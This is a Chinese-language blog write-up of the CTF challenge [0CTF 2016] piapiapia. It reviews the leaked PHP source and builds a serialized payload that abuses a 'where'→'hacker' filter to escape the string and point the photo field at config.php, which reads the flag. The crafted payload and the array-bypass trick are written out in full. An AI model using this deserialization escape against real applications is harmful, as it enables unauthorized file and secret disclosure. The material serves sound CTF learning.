[0CTF 2016]piapiapia

最新推荐文章于 2025-03-16 11:33:57 发布
最新推荐文章于 2025-03-16 11:33:57 发布
阅读量240 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_56059226/article/details/118697593
版权
本文详细介绍了如何通过分析PHP代码,利用序列化漏洞来读取隐藏的flag。首先,发现config.php中存在flag但无法直接读取。接着,观察到profile.php中的读取文件函数,以及update.php中的文件更新过程。在update.php中,通过构造特定的序列化字符串,绕过filter函数的限制,成功将photo字段指向config.php。最终,通过在nickname字段中插入一个数组,利用序列化字符串的长度差异实现逃逸,成功读取到flag。整个过程展示了SQL注入、目录扫描和PHP序列化漏洞利用的技术细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开环境看看

试一试sql注入,f12都没什么发现 。直接dirsearch扫来看看,(我们在做题扫目录的时候经常会遇见429的情况,这时候就需要调整一下扫描参数,比如dirsearch添加个延时参数,这样就大大提高了扫描效率)

扫描出来了有个www.zip。原来是原码泄露。给了几个php

先大概浏览一下,发现config.php里面有flag,但是不可读。

config.php

<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>

接着发现 profile.php里面有个读取文件的函数.

profile.php

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>

思路直接清晰,我们只需要让$profile['photo']=config.php就可以读到里面的flag了。再往上看,发现$profile被反序列化后然后又重新赋值了,那条件反射去看看序列化在哪,会发现在update.php里面有对他的序列化

update.php

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {
?>

可以看到这里可以对$profile进行赋值了,但是$profile['photo']的值又已经有一部分确定了,但是这里还有个update_profile,再去看看

	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}

他对传进去的serialize($profile)进行了filter,那就再看filter

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
	public function __tostring() {
		return __class__;
	}

他对传进去的变量设置了白名单和黑名单,这里看到他会把where换成hacker,5个字符换成了6个字符,很简单的想到了反序列化字符串逃逸,之前在这篇文章讲到过(7条消息) [安洵杯 2019]easy_serialize_php_m0_56059226的博客-优快云博客,就不在赘述,这里直接从nickname入手是最方便的。序列化后是这样

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:12:"12345@qq.com";s:8:"nickname";s:3:"123";s:5:"photo";s:39:"upload/dd7ec931179c4dcb6a8ffb8b8786d20b";}

而我们要构造成这样

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:12:"12345@qq.com";s:8:"nickname";s:3:"123";s:5:"photo";s:10:"config.php";}s:39:"upload/dd7ec931179c4dcb6a8ffb8b8786d20b";}

既然要对nickname入手,那么他的变量一定要可以控制的,他给的条件也很好绕过,因为是或,所以一个都不能满足,而preg_match是判断不了数组的直接返回false,strlen也不能判断数组长度也返回false。

还是直接附上大佬给的一张表吧

md5(Array()) = null
sha1(Array()) = null
ereg(pattern,Array()) =null
preg_match(pattern,Array()) = false
strcmp(Array(), “abc”) =null
strpos(Array(),“abc”) = null
strlen(Array()) = null

然后构造为

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:12:"12345@qq.com";s:8:"nickname";a:1:{i:0;s:3:"123";}s:5:"photo";s:10:"config.php";}s:39:"upload/dd7ec931179c4dcb6a8ffb8b8786d20b";}

最后让";}s:5:"photo";s:10:"config.php";}这34个字符造成逃逸就可以了,由于where换成hacker多了一个字符,而且他是序列化后再替换,所以要让他多34个字符去替代前面的,就需要34个where,最后也就是34*5+34=204个字符。最后为

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:12:"12345@qq.com";s:8:"nickname";a:1:{i:0;s:204:"34*where";}s:5:"photo";s:10:"config.php";}s:39:"upload/dd7ec931179c4dcb6a8ffb8b8786d20b";}

 此时34*where";}s:5:"photo";s:10:"config.php";}还是nickname的值,替换后34*hacker才是nickname的值,photo的值也变成了config.php。

先进入注册的界面,注册了账号以后,登录进去,在更新信息的界面进行抓包

注意要把nickname改成数组的形式。然后在profile.php的界面查看原码。

解码后便可得到flag。

c1oud..
关注
[0CTF-2016] piapiapia
Logerrik的博客
05-11 539
[0CTF-2016] piapiapia PHP反序列化字符逃逸 1.www.zip源码泄露 试了下发现不太像sql注入,扫下目录发现www.zip泄露 最近好多题都是这种源码泄露,建议字典齐全一点,不然扫不出来真的难受 2.源码 源码还挺多 config.php里面看到有flag,最后目标应该就是读取到config里面的flag就可以了 $config[‘hostname’] = ‘127.0.0.1’; $config[‘username’] = ‘root’; $config[‘password’
BUUCTF--[0CTF 2016]piapiapia
qq_43054896的博客
05-01 1342
一、[0CTF 2016]piapiapia 1、dirsearch扫出了了www.zip压缩包 2、审计代码,在config.php中有变量flag,但为空,flag应该在服务器的config.php文件中,要找漏洞读取服务器的flag 3、审计代码,有注册功能,且代码中要求必须注册才能进行其后的操作;update.php中对用户填写的信息进行了一些限制,且将信息序列化保存,除此之外clas...
0CTF 2016 piapiapia 1
最新发布
hddi1的博客
03-16 1110
手机号必须是11位数字。邮箱地址必须符合简单的格式规则(本地部分@域名部分.顶级域名部分)。昵称只能包含字母、数字或下划线,且长度不超过10个字符。如果任何一项验证失败,程序会立即终止并输出相应的错误信息。功能:获取通过HTTP POST上传的文件信息。逻辑是一个关联数组,包含了用户上传文件的相关信息。'photo'是表单中文件输入字段的名称,例如。$file变量将存储文件的上传信息,包括临时文件名、原始文件名、文件大小、文件类型和错误信息等。功能。
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
[0CTF 2016]piapiapia WP(详细)
qq_43622442的博客
04-25 4735
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到:::       目录扫完啥结果没有。在buuctf做题总是这样,御剑线程开1,不管有没有压缩文件,统统扫不到- -但是可以扫出来普通的php文件,dirsearch延迟和调线程,不然...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值